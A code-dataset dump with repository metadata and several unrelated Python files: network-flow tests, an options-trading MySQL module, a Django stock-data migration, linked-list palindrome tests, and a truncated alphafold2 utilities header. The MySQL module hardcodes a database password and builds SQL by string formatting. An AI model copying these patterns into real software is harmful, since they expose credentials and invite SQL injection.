hexsha
stringlengths 40
40
| size
int64 5
2.06M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
248
| max_stars_repo_name
stringlengths 5
125
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
248
| max_issues_repo_name
stringlengths 5
125
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
248
| max_forks_repo_name
stringlengths 5
125
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 5
2.06M
| avg_line_length
float64 1
1.02M
| max_line_length
int64 3
1.03M
| alphanum_fraction
float64 0
1
| count_classes
int64 0
1.6M
| score_classes
float64 0
1
| count_generators
int64 0
651k
| score_generators
float64 0
1
| count_decorators
int64 0
990k
| score_decorators
float64 0
1
| count_async_functions
int64 0
235k
| score_async_functions
float64 0
1
| count_documentation
int64 0
1.04M
| score_documentation
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
424d80dc7999edc27c21ab202ecf629475f40e26
| 2,026
|
py
|
Python
|
tests/primitives/flow/probe_tcpip_extended_unibiflow_test.py
|
kjerabek/netexp
|
362c200230ba7b2549adcedd4a9890492dad51c7
|
[
"MIT"
] | null | null | null |
tests/primitives/flow/probe_tcpip_extended_unibiflow_test.py
|
kjerabek/netexp
|
362c200230ba7b2549adcedd4a9890492dad51c7
|
[
"MIT"
] | null | null | null |
tests/primitives/flow/probe_tcpip_extended_unibiflow_test.py
|
kjerabek/netexp
|
362c200230ba7b2549adcedd4a9890492dad51c7
|
[
"MIT"
] | null | null | null |
from tests.primitives.flow import probe_tcpip_extended_biflow_test
from netexp.primitives.flow import TCPIPFlowExtendedUniBiFlowInfo
from netexp.common import naming
class TestTCPIPExtendedUniBiFlow(probe_tcpip_extended_biflow_test.TestTCPIPExtendedBiFlow):
flow_class = TCPIPFlowExtendedUniBiFlowInfo
def test_short_single_uni_flow_stats(self, probe_short_flow):
probe_short_flow.run()
processed_flow = self.output.send.call_args.args[0]
stats = processed_flow.to_dict()
assert stats[naming.TIMESTAMP_AB] == [1590076139670363, 1590076139673838, 1590076139676297, 1590076139696210,
1590076139696270, 1590076141095061, 1590076141098597]
assert stats[naming.L3_HEADER_LENGTH_AB] == [20, 20, 20, 20, 20, 20, 20]
assert stats[naming.L4_HEADER_LENGTH_AB] == [40, 32, 32, 32, 32, 32, 32]
assert stats[naming.L4_PAYSIZE_AB] == [0, 0, 517, 0, 0, 0, 0]
assert stats[naming.TCP_FLAG_PSH_AB] == [0, 0, 1, 0, 0, 0, 0]
assert stats[naming.TCP_FLAG_RST_AB] == [0, 0, 0, 0, 0, 0, 0]
assert stats[naming.TCP_FLAG_ACK_AB] == [0, 1, 1, 1, 1, 1, 1]
assert stats[naming.TCP_FLAG_FIN_AB] == [0, 0, 0, 0, 0, 1, 0]
assert stats[naming.TCP_FLAG_SYN_AB] == [1, 0, 0, 0, 0, 0, 0]
assert stats[naming.TIMESTAMP_BA] == [1590076139673781, 1590076139679702, 1590076139696191, 1590076139696249,
1590076141098561]
assert stats[naming.L3_HEADER_LENGTH_BA] == [20, 20, 20, 20, 20]
assert stats[naming.L4_HEADER_LENGTH_BA] == [40, 32, 32, 32, 32]
assert stats[naming.L4_PAYSIZE_BA] == [0, 0, 1418, 1740, 0]
assert stats[naming.TCP_FLAG_PSH_BA] == [0, 0, 0, 1, 0]
assert stats[naming.TCP_FLAG_RST_BA] == [0, 0, 0, 0, 0]
assert stats[naming.TCP_FLAG_ACK_BA] == [1, 1, 1, 1, 1]
assert stats[naming.TCP_FLAG_FIN_BA] == [0, 0, 0, 0, 1]
assert stats[naming.TCP_FLAG_SYN_BA] == [1, 0, 0, 0, 0]
| 56.277778
| 117
| 0.651037
| 1,856
| 0.916091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
424f02955cdf26ece00480c3e560a36d37aea6f6
| 19,816
|
py
|
Python
|
optionstrader/database.py
|
Zaitsev11/Optionstrader
|
ed2dbef802ad08f14a0e5280e91746f1bf1fa3f3
|
[
"MIT"
] | 6
|
2018-04-26T03:02:04.000Z
|
2022-02-26T04:58:53.000Z
|
optionstrader/database.py
|
webclinic017/Optionstrader
|
ed2dbef802ad08f14a0e5280e91746f1bf1fa3f3
|
[
"MIT"
] | null | null | null |
optionstrader/database.py
|
webclinic017/Optionstrader
|
ed2dbef802ad08f14a0e5280e91746f1bf1fa3f3
|
[
"MIT"
] | 5
|
2019-12-01T08:09:08.000Z
|
2021-11-28T03:43:24.000Z
|
import time
import mysql.connector
from optionstrader.customlogging import CustomLog
from optionstrader.parser import Parser
MYSQL_IP_ADDR = '192.168.1.10'
# Used to debug via logs
DEBUG = False
class Database:
def __init__(self):
"""
There's some confusion with database vs table.
We will have separate environments for Dev/Stage and Prd,
so we will want to ensure that the databases are separate.
TODO: Ensure that the Dev/Stage and Prod environments are fully seggregated
with their own databases. This will allows us to migrate the databases when
the time comes.
environment = 'dev' ('dev', 'stage', 'production')
database = "algotrader_".format(environment)
table = ('accounts', 'optionchainanalysis', 'optionchains', 'stocks')
"""
# initiate the connection when the database object is created
# Standard procedure will be to open the connection,
# perform the action, then close the connection
self.log = CustomLog()
self.parser = Parser()
self.connection = self.connect_to_database()
# CONFIGURATION
# Possible Values: "Dev", "Stage", "Production"
# Changebelow code when config file exists
self.environment = "Dev"
self.database_name = "algotrader_dev"
# Below is used to determine how far back in seconds the analyzer tool should go
# The reason behind this is because we do not want to delete stock market date
# Instead, we would rather query the database and only select the records that
# are within the threshold
def connect_to_database(self):
# try:
# Using loopback for testing purposes. Might use socket level later.
return mysql.connector.connect(user='optionstrader_service_account', password='helloworld',
host=MYSQL_IP_ADDR,
port='3306')
#database='algotrader_data'
#mysql.connector.errors.InterfaceError: 2003: Can't connect to MySQL server on 'localwhost:3306'
# except Exception as e:
# msg = "Error! Please check the MySQL database connection: {error}".format(error=e)
# self.log.debug(msg)
def configure_database(self):
database_name = "algotrader_dev"
self.create_database(database_name)
table_columns = "(account_number TEXT, account_type TEXT, balance FLOAT, total_deposits FLOAT, total_withdrawls FLOAT)"
table_name = "accounts"
self.create_table(database_name, table_name, table_columns)
table_columns = "(symbol TEXT, company_name TEXT)"
table_name = "stocks"
self.create_table(database_name, table_name, table_columns)
table_columns = "(symbol TEXT)"
table_name = "optionchains"
self.create_table(database_name, table_name, table_columns)
table_columns = "(symbol TEXT)"
table_name = "optionchainanalysis"
self.create_table(database_name, table_name, table_columns)
# self.parse_symbols_and_add_to_db()
self.log.debug("Database has been configured")
return True
def create_database(self, database_name):
try:
cursor = self.connection.cursor()
query = ("CREATE DATABASE {database_name}").format(database_name=database_name)
cursor.execute(query)
output = self.connection.commit()
cursor.close()
msg = "Database `{database_name}` created.".format(
database_name=database_name)
self.log.debug(msg)
return True
except:
msg = "Database `{database_name}` can't be created.".format(
database_name=database_name)
self.log.debug(msg)
def create_table(self, database_name, table_name, table_columns):
try:
cursor = self.connection.cursor()
query = "CREATE TABLE {database_name}.{table_name} {table_columns}".format(
database_name=database_name,
table_name=table_name,
table_columns=table_columns)
cursor.execute(query)
output = self.connection.commit()
cursor.close()
msg = "Table `{table_name} created in database `{database_name}`.".format(
database_name=database_name,
table_name=table_name)
self.log.debug(msg)
return True
except:
msg = "Table `{table_name}` can't be created.".format(
table_name=table_name)
self.log.debug(msg)
def close_connection(self):
self.connection.close()
# ====================================
# ====================================
# === Code used for Account Class ====
# ====================================
# ====================================
def update_account(self, balance, account_type):
cursor = self.connection.cursor()
query = ("UPDATE {db}.accounts SET balance={balance} WHERE account_type=\'{account_type}\'".format(
db=self.database_name,
balance=balance,
account_type=account_type))
cursor.execute(query)
self.connection.commit()
cursor.close()
def get_recommended_option_purchase(self):
# TODO
results_table_cursor = self.connection.cursor()
#query = ("SELECT balance FROM accounts{env} where account_type='checking'".format(env=self.environment))
_query = ("SELECT * FROM optionchainanalysisDev ",
"WHERE `total_price_paid_1x` BETWEEN 0 and 100 AND ",
"`potential_profit_1x` BETWEEN 50 and 100 AND ",
"`stock_price_increase` < 3.5 AND ",
"`magic_number` BETWEEN 3 and 10 AND ",
"`expiration_date` LIKE '2017-03-03' AND ",
"`risk_percentage_1x` BETWEEN 0 and 18 ",
"ORDER BY `timestamp` DESC")
query = "".join(_query)
log_msg = query
#
#
self.connection.commit()
result = results_table_cursor.execute(query)
results_table = []
for record in results_table_cursor:
results_table.append(record)
return results_table
#for record in results_table:
# return record
def get_list_of_tickers(self, query_type='default'):
# TODO Implement the following:
# We will want to stream data from external to the database then stream the symbols from the database
# as they're made available.
table = 'optionchains'
if query_type == 'default':
# Run the normal code here
query = "SELECT DISTINCT symbol FROM {db}.stocks WHERE symbol is not Null".format(
db=self.database_name)
if query_type == 'options_only':
# Run the code to only retrieve symbols which have had stock options in the past
query = "SELECT DISTINCT underlying FROM {db}.{table} WHERE underlying is not Null".format(
db=self.database_name,
table=table,
env=self.environment)
if query_type == 'one_option_only':
# Arbritrary first option only.
# Usually used for testing purposes
query = "SELECT DISTINCT underlying FROM {db}.{table} WHERE underlying is not Null LIMIT 1".format(
db=self.database_name,
table=table,
env=self.environment)
else:
# Run a special SQL query here, which returns the symbols in a specific order
pass
cursor = self.connection.cursor()
# As of 2/11/17, there are 3078 total results from this query
self.connection.commit()
result = cursor.execute(query)
print(result)
list_of_tickers = list()
for ticker in cursor:
#print(ticker[0])
list_of_tickers.append(ticker[0])
# Return type is a python list [u'AAPL', ..., u'GOOG']
return list_of_tickers
def get_current_stock_price(self, symbol):
# We want to make sure that the 'last_' price is within reason. We don't want to
# pay 100x the average price of the item.
cursor = self.connection.cursor(dictionary=True)
query = "SELECT * FROM {db}.stocks WHERE symbol LIKE \'{symbol}\' ORDER BY `timestamp` DESC LIMIT 1".format(
db=self.database_name,
symbol=symbol)
self.connection.commit()
result = cursor.execute(query)
for stock_data in cursor:
return stock_data['last_']
def get_example_option_chains(self, num_chains_limit=1):
# This function has a much less accurate query than query_option_chains_for_analysis
# This function is typically used for testing purposes
cursor = self.connection.cursor(dictionary=True, buffered=True)
query = ("SELECT * from {db}.optionchains LIMIT {num_chains_limit}".format(
db=self.database_name,
num_chains_limit=num_chains_limit))
self.connection.commit()
cursor.execute(query)
self.log.debug("****Type:{0}".format(type(cursor)))
return cursor
# Only iterate once
#for option_chain in cursor:
# return option_chain, cursor[option_chain]
# list_of_option_chains is all of the option chains for the ticker
# therefore, we need to select and return the most recent one.
cursor = self.connection.cursor()
# As of 2/11/17, there are 3078 total results from this query
query = "SELECT * from {db}.optionchains LIMIT 1".format(
db=self.database_name)
self.connection.commit()
option_chain = cursor.execute(query)
return option_chain
def query_option_chains_for_analysis(self,
ticker=None, current_timestamp=int(time.time()), time_threshold=30000,
max_num_option_chains=40):
# This function has a more precise query than get_example_option_chains
# If no tickers are specified, retrieve the most recent option_chains
if ticker == None:
cursor = self.connection.cursor(dictionary=True, buffered=True)
query_1 = "SELECT * FROM {db}.optionchains WHERE type LIKE 'option' and ".format(
db=self.database_name)
query_2 = "timestamp > ({current_timestamp}-{time_threshold}) and ".format(
time_threshold=time_threshold,
current_timestamp=current_timestamp)
query_3 = "option_type LIKE 'call' ORDER BY `timestamp` DESC LIMIT {max_num_option_chains}".format(max_num_option_chains=max_num_option_chains)
query = (query_1 + query_2 + query_3)
self.log.debug(query)
result = cursor.execute(query)
self.log.debug(cursor.fetchone())
self.connection.commit()
# If a ticker is specified, retrieve the most recent option_chains
else:
# We want to return the dictionary type
# we need a MySQL buffered response
cursor = self.connection.cursor(dictionary=True, buffered=True)
query_1 = "SELECT * FROM {db}.optionchains WHERE type LIKE 'option' and ".format(
db=self.database_name)
query_2 = "timestamp > ({current_timestamp}-{time_threshold}) and underlying LIKE '{ticker}' and ".format(ticker=ticker,
time_threshold=time_threshold,
current_timestamp=current_timestamp)
query_3 = "option_type LIKE 'call' ORDER BY `timestamp` DESC LIMIT {max_num_option_chains}".format(max_num_option_chains=max_num_option_chains)
query = (query_1 + query_2 + query_3)
result = cursor.execute(query)
self.connection.commit()
"""
# cursor is a MySQLCursorDict object.
# cursor is a MySQLCursorDict: SELECT * FROM optionchainsDev WHERE type..
# retrieve results using cursor.fetchall()
"""
return cursor
# DEPRICATED
#result = cursor.execute(query)
# Iterate over all options in the option chains in the database for that ticker.
# Sorted by time in descending order
#all_options = []
#for option_chain in cursor:
# all_options.append(option_chain)
#return all_options
def sanitize_field_names(self, field_name):
sanitized_field_names_pairs = {
'change': 'change_',
'close': 'close_',
'open': 'open_',
'last': 'last_'
}
field_name = str(field_name)
for name in sanitized_field_names_pairs.keys():
if field_name == name:
sanitized_field_name = sanitized_field_names_pairs[name]
return sanitized_field_name
return field_name
def save_option_chain_to_table(self, option_chain, table='optionchains'):
# PLEASE NOTE:
# If a new keyword (column) is detected, then the INSERT INTO command will fail
# The next time that the option chain is attempted to be saved, the record
# will update.
attempt_number = 0
while True:
try:
# add timestamp here
option_chain['timestamp']=int(time.time())
cursor = self.connection.cursor()
#"{} {}".format(str(a.keys()).replace("'", ""), str(a.values()).replace("'", ""))
#option_chain.keys(), option_chain.values()
KEYS = [self.sanitize_field_names(i) for i in option_chain.keys()]
VALUES = [str(i) for i in option_chain.values()]
# Should never have the single character apostrophy.
# Error out, if it contains once
keys_error = [str(i).find("'") for i in option_chain.keys()]
values_error = [str(i).find("'") for i in option_chain.values()]
if max(max(keys_error), max(values_error)) != -1:
log_msg = ""
log_msg = "Error: single character apostrophy located in option_chain!"
keys_formatted = str("(" + str(KEYS)[1:-1] + ")").replace("'", "")
values_formatted = str("(" + str(VALUES)[1:-1] + ")")
query = ("INSERT INTO {db}.{table} {keys} VALUES {values}").format(
db=self.database_name,
table=table,
keys=keys_formatted,
values=values_formatted)
log_msg = "~~~~-----------------~~~"
query = query.replace("'None'", 'NULL')
if DEBUG is True:
print(query)
cursor.execute(query)
self.connection.commit()
cursor.close()
# Break the while loop
break
except mysql.connector.ProgrammingError:
# This means that the fields don't exist on the database
# time to add the fields to the database
log_msg = "Warning. Trying to update the database with fields which don't yet exist in the table."
# Unsure which key is the problem one.
# Try to create a field with each key.
# if the key is already a field on the database, then pass without error
for field_name in KEYS:
# mySQL database needs specific table names to be off limits
try:
field_type = self.type_conversion(option_chain[field_name])
except:
field_type = self.type_conversion(option_chain[field_name[:-1]])
try:
self.add_new_column_to_table(field_name, field_type, table=table)
except mysql.connector.ProgrammingError:
pass
log_msg = "Information. The fields were updated in table '{0}'.".format(table)
if attempt_number == 1:
log_msg = "Error: Unable to update SQL table"
break
else:
log_msg = "Retrying the update to the table"
attempt_number += 1
return True
def update_option_chain_with_analysis(self, percentage_increase_analysis):
# This is the analysis done for the percentage increase (1,2,5 percent)
# of an underlyer
result = self.save_option_chain_to_table(percentage_increase_analysis, table='optionchainanalysis')
return True
def add_new_column_to_table(self, column_name, data_type, table):
cursor = self.connection.cursor()
env = self.environment
query = "ALTER TABLE {db}.{table} ADD {column_name} {data_type}".format(
db=self.database_name,
table=table,
column_name=column_name,
data_type=data_type)
cursor.execute(query)
self.connection.commit()
return True
def add_money_to_account(self, amount_of_money, account_type):
current_balance = self.get_checking_account_balance()
output = str(current_balance + amount_of_money)
self.update_checking_account(output)
print(self.get_checking_account_balance())
def subtract_money_from_account(self, amount_of_money, account_type):
current_balance = self.get_checking_account_balance()
output = str(current_balance - amount_of_money)
self.update_checking_account(output)
print(self.get_checking_account_balance())
def add_field_to_table(self, field, _type):
cursor = self.connection.cursor()
#query = ("ALTER TABLE stocks ADD %s %s") % (field, type)
query = "ALTER TABLE {db}.stocks ADD {field} {type}".format(
db=self.database_name,
field=field,
type=_type)
cursor.execute(query)
self.connection.commit()
cursor.close()
def insert_values_into_table(self, column_string, value_string):
cursor = self.connection.cursor()
query = "INSERT INTO {db}.stocks {column_string} VALUES {value_string}".format(
db=self.database_name,
column_string=column_string,
value_string=value_string)
self.log.debug(query)
cursor.execute(query)
self.connection.commit()
cursor.close()
def type_conversion(self, object_item):
# We need to convert the types so that the sql database knows what to do
# The names of the types differs between python and mysql
# Examples: unicode, NoneType, int, float
obj_type = type(object_item)
#self.log.debug(object_item)
#self.log.debug(obj_type)
obj_type_str = str(obj_type).split("'")[1]
if obj_type_str == 'unicode':
return "text"
if obj_type_str == 'float':
return "float"
if obj_type_str == 'NoneType':
return "text"
if obj_type_str == 'int':
return "bigint(20)"
else:
return "text"
def parse_symbols_and_add_to_db(self):
# technically this should go in a separate test_parser module... TODO.
results = self.parser.extract_symbols()
for symbol_and_name in results[1:]:
column_string = "(symbol, company_name)"
value_string = "(\"{symbol}\", \"{company_name}\")".format(
symbol=symbol_and_name[0],company_name=symbol_and_name[1])
self.insert_values_into_table(column_string, value_string)
msg = "Symbols parsed and added to database"
self.log.debug(msg)
return results
| 41.717895
| 155
| 0.605874
| 19,618
| 0.990008
| 0
| 0
| 0
| 0
| 0
| 0
| 7,637
| 0.385396
|
424fc9a502a8c9fe3c5da2a1e3dec902d92abba5
| 10,254
|
py
|
Python
|
backend/api/migrations/0001_initial.py
|
leowotzak/ljwe-db
|
ab49f90feaac5fad26efa900db5567c9c09f3435
|
[
"MIT"
] | null | null | null |
backend/api/migrations/0001_initial.py
|
leowotzak/ljwe-db
|
ab49f90feaac5fad26efa900db5567c9c09f3435
|
[
"MIT"
] | 9
|
2021-11-17T18:31:29.000Z
|
2021-11-21T00:47:39.000Z
|
backend/api/migrations/0001_initial.py
|
leowotzak/ljwe-db
|
ab49f90feaac5fad26efa900db5567c9c09f3435
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.2.9 on 2021-11-24 02:52
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Symbol',
fields=[
('symbol_id', models.AutoField(primary_key=True, serialize=False)),
('name', models.CharField(max_length=200)),
('ticker', models.CharField(max_length=30)),
('description', models.TextField(blank=True, null=True)),
('sector', models.CharField(blank=True, max_length=30, null=True)),
('asset_type', models.CharField(blank=True, max_length=30, null=True)),
('created_date', models.DateTimeField(blank=True, null=True)),
('last_updated_date', models.DateTimeField(blank=True, null=True)),
],
options={
'db_table': 'symbol',
'managed': True,
},
),
migrations.CreateModel(
name='BarDataWeekly',
fields=[
('timestamp', models.DateTimeField(primary_key=True, serialize=False)),
('open_price', models.FloatField()),
('high_price', models.FloatField()),
('low_price', models.FloatField()),
('close_price', models.FloatField()),
('adj_close_price', models.FloatField(blank=True, null=True)),
('volume', models.IntegerField()),
('dividend_amount', models.FloatField(blank=True, null=True)),
('split_coeff', models.FloatField(blank=True, null=True)),
('created_date', models.DateTimeField(blank=True, null=True)),
('last_updated_date', models.DateTimeField(blank=True, null=True)),
('symbol', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='api.symbol')),
],
options={
'db_table': 'bar_data_weekly',
'managed': True,
'unique_together': {('timestamp', 'symbol')},
},
),
migrations.CreateModel(
name='BarDataMonthly',
fields=[
('timestamp', models.DateTimeField(primary_key=True, serialize=False)),
('open_price', models.FloatField()),
('high_price', models.FloatField()),
('low_price', models.FloatField()),
('close_price', models.FloatField()),
('adj_close_price', models.FloatField(blank=True, null=True)),
('volume', models.IntegerField()),
('dividend_amount', models.FloatField(blank=True, null=True)),
('split_coeff', models.FloatField(blank=True, null=True)),
('created_date', models.DateTimeField(blank=True, null=True)),
('last_updated_date', models.DateTimeField(blank=True, null=True)),
('symbol', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='api.symbol')),
],
options={
'db_table': 'bar_data_monthly',
'managed': True,
'unique_together': {('timestamp', 'symbol')},
},
),
migrations.CreateModel(
name='BarDataDaily',
fields=[
('timestamp', models.DateTimeField(primary_key=True, serialize=False)),
('open_price', models.FloatField()),
('high_price', models.FloatField()),
('low_price', models.FloatField()),
('close_price', models.FloatField()),
('adj_close_price', models.FloatField(blank=True, null=True)),
('volume', models.IntegerField()),
('dividend_amount', models.FloatField(blank=True, null=True)),
('split_coeff', models.FloatField(blank=True, null=True)),
('created_date', models.DateTimeField(blank=True, null=True)),
('last_updated_date', models.DateTimeField(blank=True, null=True)),
('symbol', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='api.symbol')),
],
options={
'db_table': 'bar_data_daily',
'managed': True,
'unique_together': {('timestamp', 'symbol')},
},
),
migrations.CreateModel(
name='BarData5Min',
fields=[
('timestamp', models.DateTimeField(primary_key=True, serialize=False)),
('open_price', models.FloatField()),
('high_price', models.FloatField()),
('low_price', models.FloatField()),
('close_price', models.FloatField()),
('adj_close_price', models.FloatField(blank=True, null=True)),
('volume', models.IntegerField()),
('dividend_amount', models.FloatField(blank=True, null=True)),
('split_coeff', models.FloatField(blank=True, null=True)),
('created_date', models.DateTimeField(blank=True, null=True)),
('last_updated_date', models.DateTimeField(blank=True, null=True)),
('symbol', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='api.symbol')),
],
options={
'db_table': 'bar_data_5min',
'managed': True,
'unique_together': {('timestamp', 'symbol')},
},
),
migrations.CreateModel(
name='BarData30Min',
fields=[
('timestamp', models.DateTimeField(primary_key=True, serialize=False)),
('open_price', models.FloatField()),
('high_price', models.FloatField()),
('low_price', models.FloatField()),
('close_price', models.FloatField()),
('adj_close_price', models.FloatField(blank=True, null=True)),
('volume', models.IntegerField()),
('dividend_amount', models.FloatField(blank=True, null=True)),
('split_coeff', models.FloatField(blank=True, null=True)),
('created_date', models.DateTimeField(blank=True, null=True)),
('last_updated_date', models.DateTimeField(blank=True, null=True)),
('symbol', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='api.symbol')),
],
options={
'db_table': 'bar_data_30min',
'managed': True,
'unique_together': {('timestamp', 'symbol')},
},
),
migrations.CreateModel(
name='BarData1Min',
fields=[
('timestamp', models.DateTimeField(primary_key=True, serialize=False)),
('open_price', models.FloatField()),
('high_price', models.FloatField()),
('low_price', models.FloatField()),
('close_price', models.FloatField()),
('adj_close_price', models.FloatField(blank=True, null=True)),
('volume', models.IntegerField()),
('dividend_amount', models.FloatField(blank=True, null=True)),
('split_coeff', models.FloatField(blank=True, null=True)),
('created_date', models.DateTimeField(blank=True, null=True)),
('last_updated_date', models.DateTimeField(blank=True, null=True)),
('symbol', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='api.symbol')),
],
options={
'db_table': 'bar_data_1min',
'managed': True,
'unique_together': {('timestamp', 'symbol')},
},
),
migrations.CreateModel(
name='BarData1H',
fields=[
('timestamp', models.DateTimeField(primary_key=True, serialize=False)),
('open_price', models.FloatField()),
('high_price', models.FloatField()),
('low_price', models.FloatField()),
('close_price', models.FloatField()),
('adj_close_price', models.FloatField(blank=True, null=True)),
('volume', models.IntegerField()),
('dividend_amount', models.FloatField(blank=True, null=True)),
('split_coeff', models.FloatField(blank=True, null=True)),
('created_date', models.DateTimeField(blank=True, null=True)),
('last_updated_date', models.DateTimeField(blank=True, null=True)),
('symbol', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='api.symbol')),
],
options={
'db_table': 'bar_data_1h',
'managed': True,
'unique_together': {('timestamp', 'symbol')},
},
),
migrations.CreateModel(
name='BarData15Min',
fields=[
('timestamp', models.DateTimeField(primary_key=True, serialize=False)),
('open_price', models.FloatField()),
('high_price', models.FloatField()),
('low_price', models.FloatField()),
('close_price', models.FloatField()),
('adj_close_price', models.FloatField(blank=True, null=True)),
('volume', models.IntegerField()),
('dividend_amount', models.FloatField(blank=True, null=True)),
('split_coeff', models.FloatField(blank=True, null=True)),
('created_date', models.DateTimeField(blank=True, null=True)),
('last_updated_date', models.DateTimeField(blank=True, null=True)),
('symbol', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='api.symbol')),
],
options={
'db_table': 'bar_data_15min',
'managed': True,
'unique_together': {('timestamp', 'symbol')},
},
),
]
| 49.062201
| 111
| 0.536083
| 10,128
| 0.987712
| 0
| 0
| 0
| 0
| 0
| 0
| 2,185
| 0.213088
|
42500bb71a15c0815810b37eafb946db4fb96b64
| 3,713
|
py
|
Python
|
Ch2_Linked_Lists/test/test_CTCI_Ch2_Ex6.py
|
mtrdazzo/CTCI
|
30a82aed96b05fe21b7d337a138e4ec19950eb9d
|
[
"MIT"
] | null | null | null |
Ch2_Linked_Lists/test/test_CTCI_Ch2_Ex6.py
|
mtrdazzo/CTCI
|
30a82aed96b05fe21b7d337a138e4ec19950eb9d
|
[
"MIT"
] | null | null | null |
Ch2_Linked_Lists/test/test_CTCI_Ch2_Ex6.py
|
mtrdazzo/CTCI
|
30a82aed96b05fe21b7d337a138e4ec19950eb9d
|
[
"MIT"
] | null | null | null |
from unittest import TestCase
from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node
from CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6 import PalindromeSinglyLinkedList, is_palindrome_brute_force
from CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6 import is_palindrome_reverse
class TestPalindromeSinglyLinkedList(TestCase):
def setUp(self):
self.pll = PalindromeSinglyLinkedList()
def tearDown(self):
self.pll = None
def test_empty_list(self):
with self.assertRaises(Empty):
self.pll.is_palindrome()
def test_single_element(self):
self.pll.add(1)
self.assertTrue(self.pll.is_palindrome())
def test_two_elements(self):
self.pll.add(1)
self.pll.add(1)
self.assertTrue(self.pll.is_palindrome())
self.pll.remove(1)
self.pll.add(2)
self.assertFalse(self.pll.is_palindrome())
def test_more_than_two_elements_even(self):
self.pll.add(1)
self.pll.add(2)
self.pll.add(2)
self.pll.add(2)
self.assertFalse(self.pll.is_palindrome())
self.pll.remove(2)
self.pll.add(1)
self.assertTrue(self.pll.is_palindrome())
def test_more_than_two_elements_odd(self):
self.pll.add(1)
self.pll.add(2)
self.pll.add(2)
self.assertFalse(self.pll.is_palindrome())
self.pll.remove(2)
self.pll.add(1)
self.assertTrue(self.pll.is_palindrome())
class TestPalindromeBruteForce(TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_empty_linked_list(self):
self.assertIsNone(is_palindrome_brute_force(None))
def test_single_element(self):
list = Node(1)
self.assertTrue(is_palindrome_brute_force(list))
def test_two_elements(self):
list = Node(1)
list.next = Node(2)
self.assertFalse(is_palindrome_brute_force(list))
list.next = Node(1)
self.assertTrue(is_palindrome_brute_force(list))
def test_odd_elements(self):
list = Node(1)
list.next = Node(2)
list.next.next = Node(2)
self.assertFalse(is_palindrome_brute_force(list))
list.next.next = Node(1)
self.assertTrue(is_palindrome_brute_force(list))
def test_even_elements(self):
list = Node(1)
list.next = Node(2)
list.next.next = Node(2)
list.next.next.next = Node(3)
self.assertFalse(is_palindrome_brute_force(list))
list.next.next.next = Node(1)
self.assertTrue(is_palindrome_brute_force(list))
class TestPalindromeReverse(TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_empty_node(self):
self.assertIsNone(is_palindrome_reverse(None))
def test_single_node(self):
self.assertTrue(is_palindrome_reverse(Node(1)))
def test_two_nodes(self):
l_list = Node(1)
l_list.next = Node(2)
self.assertFalse(is_palindrome_reverse(l_list))
l_list.next = Node(1)
self.assertTrue(is_palindrome_reverse(l_list))
def test_odd_nodes(self):
l_list = Node(1)
l_list.next = Node(2)
l_list.next.next = Node(3)
self.assertFalse(is_palindrome_reverse(l_list))
l_list.next.next = Node(1)
self.assertTrue(is_palindrome_reverse(l_list))
def test_even_nodes(self):
l_list = Node(1)
l_list.next = Node(2)
l_list.next = Node(2)
l_list.next = Node(3)
self.assertFalse(is_palindrome_reverse(l_list))
l_list.next.next = Node(1)
self.assertTrue(is_palindrome_reverse(l_list))
| 24.919463
| 110
| 0.649879
| 3,414
| 0.919472
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
4250d5da81ea72feff3b65a105d5b2c76567a7d7
| 49,917
|
py
|
Python
|
alphafold2_pytorch/utils.py
|
nilbot/alphafold2
|
455124ca9135e534739b9670c010512487965547
|
[
"MIT"
] | 1
|
2022-01-21T04:58:18.000Z
|
2022-01-21T04:58:18.000Z
|
alphafold2_pytorch/utils.py
|
nilbot/alphafold2
|
455124ca9135e534739b9670c010512487965547
|
[
"MIT"
] | null | null | null |
alphafold2_pytorch/utils.py
|
nilbot/alphafold2
|
455124ca9135e534739b9670c010512487965547
|
[
"MIT"
] | null | null | null |
# utils for working with 3d-protein structures
import os
import numpy as np
import torch
from functools import wraps
from einops import rearrange, repeat
# import torch_sparse # only needed for sparse nth_deg adj calculation
# bio
from Bio import SeqIO
import itertools
import string
# sidechainnet
from sidechainnet.utils.sequence import ProteinVocabulary, ONE_TO_THREE_LETTER_MAP
from sidechainnet.utils.measure import GLOBAL_PAD_CHAR
from sidechainnet.structure.build_info import NUM_COORDS_PER_RES, BB_BUILD_INFO, SC_BUILD_INFO
from sidechainnet.structure.StructureBuilder import _get_residue_build_iter
# build vocabulary
VOCAB = ProteinVocabulary()
# constants
